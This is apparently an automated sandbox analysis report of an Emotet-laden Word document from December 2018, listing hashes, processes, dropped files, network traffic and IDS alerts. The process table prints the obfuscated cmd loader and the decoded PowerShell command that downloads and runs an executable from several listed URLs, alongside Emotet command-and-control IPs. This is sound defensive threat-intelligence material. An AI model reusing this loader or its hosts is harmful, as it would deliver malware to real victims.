File name: | 121920187A9V23160.doc |
Full analysis: | https://app.any.run/tasks/802efc5a-5d4b-4bd0-a695-889f0fc18d25 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 18, 2018, 21:31:51 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 20:15:00 2018, Last Saved Time/Date: Tue Dec 18 20:15:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 26, Security: 0 |
MD5: | 6024ADFE9C7E91E6BB9367AA61CC6476 |
SHA1: | 0E216E4D64722E3D50E4E43AB50735A814009FFB |
SHA256: | F043CB2F6FEC7AAC1014308A4EFF9B1F5BBFA5187D0AA6B5123079616C6951E7 |
SSDEEP: | 1536:bd81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadugQ8UUaovoU+a9:bd8GhDS0o9zTGOZD6EbzCdugQ8/o |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:18 20:15:00 |
ModifyDate: | 2018:12:18 20:15:00 |
Pages: | 1 |
Words: | 4 |
Characters: | 26 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 29 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2832 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\121920187A9V23160.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4084 | c:\i0651860547267\h3249438289644\Q4051730915624\..\..\..\windows\system32\cmd.exe /c %pRogRaMdATa:~0,1%%prOGraMdATA:~9,2% /V:On /C " sET AP=;'378s'=811a$}}{hctac}};kaerb;'416I'=713D$;650T$ metI-ekovnI{ )00008 eg- htgnel.)650T$ metI-teG(( fI;'499O'=403E$;)650T$ ,554A$(eliFdaolnwoD.714o${yrt{)105C$ ni 554A$(hcaerof;'exe.'+846j$+'\'+pmet:vne$=650T$;'610Q'=557f$;'876' = 846j$;'316G'=988C$;)'@'(tilpS.'HISlYGVwv/slianbmuhTpw/segami/lortnocemoh/moc.gnisiurctsuj//:ptth@44lqDch2/ten.ngisedycal//:ptth@ttcvje2by5/moc.ennaojybedam//:ptth@xxaiBq8Ga/moc.zepolohcnap//:ptth@qFAy6Zuy/moc.syskilk//:ptth'=105C$;tneilCbeW.teN tcejbo-wen=714o$;'234w'=126j$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop& FOr /l %3 iN ( 554 -1 0)do SET 7ne=!7ne!!AP:~ %3, 1!&IF %3 == 0 ecHO !7ne:~5! | C%appdAtA:~-4,1%%sYSTeMrooT:~-4,-3% " | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2600 | CmD /V:On /C " sET AP=;'378s'=811a$}}{hctac}};kaerb;'416I'=713D$;650T$ metI-ekovnI{ )00008 eg- htgnel.)650T$ metI-teG(( fI;'499O'=403E$;)650T$ ,554A$(eliFdaolnwoD.714o${yrt{)105C$ ni 554A$(hcaerof;'exe.'+846j$+'\'+pmet:vne$=650T$;'610Q'=557f$;'876' = 846j$;'316G'=988C$;)'@'(tilpS.'HISlYGVwv/slianbmuhTpw/segami/lortnocemoh/moc.gnisiurctsuj//:ptth@44lqDch2/ten.ngisedycal//:ptth@ttcvje2by5/moc.ennaojybedam//:ptth@xxaiBq8Ga/moc.zepolohcnap//:ptth@qFAy6Zuy/moc.syskilk//:ptth'=105C$;tneilCbeW.teN tcejbo-wen=714o$;'234w'=126j$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop& FOr /l %3 iN ( 554 -1 0)do SET 7ne=!7ne!!AP:~ %3, 1!&IF %3 == 0 ecHO !7ne:~5! | Cmd " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2608 | C:\Windows\system32\cmd.exe /S /D /c" ecHO pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $j621='w432';$o417=new-object Net.WebClient;$C501='http://kliksys.com/yuZ6yAFq@http://pancholopez.com/aG8qBiaxx@http://madebyjoanne.com/5yb2ejvctt@http://lacydesign.net/2hcDql44@http://justcruising.com/homecontrol/images/wpThumbnails/vwVGYlSIH'.Split('@');$C889='G613';$j648 = '678';$f755='Q016';$T056=$env:temp+'\'+$j648+'.exe';foreach($A455 in $C501){try{$o417.DownloadFile($A455, $T056);$E304='O994';If ((Get-Item $T056).length -ge 80000) {Invoke-Item $T056;$D317='I614';break;}}catch{}}$a118='s873'; " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2696 | Cmd | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3160 | powershell $j621='w432';$o417=new-object Net.WebClient;$C501='http://kliksys.com/yuZ6yAFq@http://pancholopez.com/aG8qBiaxx@http://madebyjoanne.com/5yb2ejvctt@http://lacydesign.net/2hcDql44@http://justcruising.com/homecontrol/images/wpThumbnails/vwVGYlSIH'.Split('@');$C889='G613';$j648 = '678';$f755='Q016';$T056=$env:temp+'\'+$j648+'.exe';foreach($A455 in $C501){try{$o417.DownloadFile($A455, $T056);$E304='O994';If ((Get-Item $T056).length -ge 80000) {Invoke-Item $T056;$D317='I614';break;}}catch{}}$a118='s873'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2476 | "C:\Users\admin\AppData\Local\Temp\678.exe" | C:\Users\admin\AppData\Local\Temp\678.exe | — | powershell.exe |
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: Stoh Levadihote (non-ShiftLock) Keyboa Exit code: 0 | ||||
3236 | "C:\Users\admin\AppData\Local\Temp\678.exe" | C:\Users\admin\AppData\Local\Temp\678.exe | 678.exe | |
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: Stoh Levadihote (non-ShiftLock) Keyboa Exit code: 0 | ||||
2916 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 678.exe |
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: Stoh Levadihote (non-ShiftLock) Keyboa Exit code: 0 | ||||
3404 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | |
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: Stoh Levadihote (non-ShiftLock) Keyboa |
PID | Process | Filename | Type | |
---|---|---|---|---|
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8D13.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C67505AD.wmf | — | |
MD5:— | SHA256:— | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA3C5143.wmf | — | |
MD5:— | SHA256:— | |||
3160 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\64MUMPUUN9KQFFSDR6H5.temp | — | |
MD5:— | SHA256:— | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:F7123D8F84C82D70BE3A2FDB3AE61BC0 | SHA256:8B13C9874C6DD9798D38D931EA3870E0036D0211CF875329D2BFFB832C91FDEE | |||
3160 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\421937CA.wmf | wmf | |
MD5:979A2B65F157282E9DD4CA39ABC95A78 | SHA256:652DB83709BE73BA9A92723B73CCEFCC1AE9B859F870E26B6EBC10248DB063DC | |||
3236 | 678.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:CC4E8AB88AFA5B810A3FDAC5D11DCD5F | SHA256:48EAE9CD765777DE531E06DA251E5B02118871E6E3986EEF580443808B3F8432 | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:3E4CFF688FD3055569BCE3CEBEBB0BAB | SHA256:3CC8A8056BE01C55F9374664389D18C26592B1D993C38137FDE23D8977A1AD04 | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90807D5C.wmf | wmf | |
MD5:EDB2F62BADC35E507F10B2FAEECC571F | SHA256:57A15807E410C55271B1738DE2312D61174E4126E049051484FB241B430DF3DD |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3404 | archivesymbol.exe | GET | — | 187.140.90.91:8080 | http://187.140.90.91:8080/ | MX | — | — | malicious |
3404 | archivesymbol.exe | GET | — | 201.190.150.60:443 | http://201.190.150.60:443/ | AR | — | — | malicious |
3404 | archivesymbol.exe | GET | — | 78.189.21.131:80 | http://78.189.21.131/ | TR | — | — | malicious |
3160 | powershell.exe | GET | 200 | 158.69.193.16:80 | http://kliksys.com/yuZ6yAFq/ | CA | executable | 124 Kb | malicious |
3160 | powershell.exe | GET | 301 | 158.69.193.16:80 | http://kliksys.com/yuZ6yAFq | CA | html | 236 b | malicious |
3404 | archivesymbol.exe | GET | — | 181.197.253.133:8080 | http://181.197.253.133:8080/ | AR | — | — | suspicious |
3404 | archivesymbol.exe | GET | 200 | 70.55.69.202:7080 | http://70.55.69.202:7080/ | CA | binary | 132 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3160 | powershell.exe | 158.69.193.16:80 | kliksys.com | OVH SAS | CA | suspicious |
3404 | archivesymbol.exe | 81.150.17.158:50000 | — | British Telecommunications PLC | GB | malicious |
3404 | archivesymbol.exe | 78.189.21.131:80 | — | Turk Telekom | TR | malicious |
3404 | archivesymbol.exe | 213.120.119.231:8443 | — | British Telecommunications PLC | GB | malicious |
3404 | archivesymbol.exe | 81.150.17.158:8443 | — | British Telecommunications PLC | GB | malicious |
3404 | archivesymbol.exe | 187.140.90.91:8080 | — | Uninet S.A. de C.V. | MX | malicious |
3404 | archivesymbol.exe | 201.190.150.60:443 | — | ARLINK S.A. | AR | malicious |
3404 | archivesymbol.exe | 70.55.69.202:7080 | — | Bell Canada | CA | suspicious |
3404 | archivesymbol.exe | 181.197.253.133:8080 | — | BVNET S.A. | AR | suspicious |
Domain | IP | Reputation |
---|---|---|
kliksys.com |
| malicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3160 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3160 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3160 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3160 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3160 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3404 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3404 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3404 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3404 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3404 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |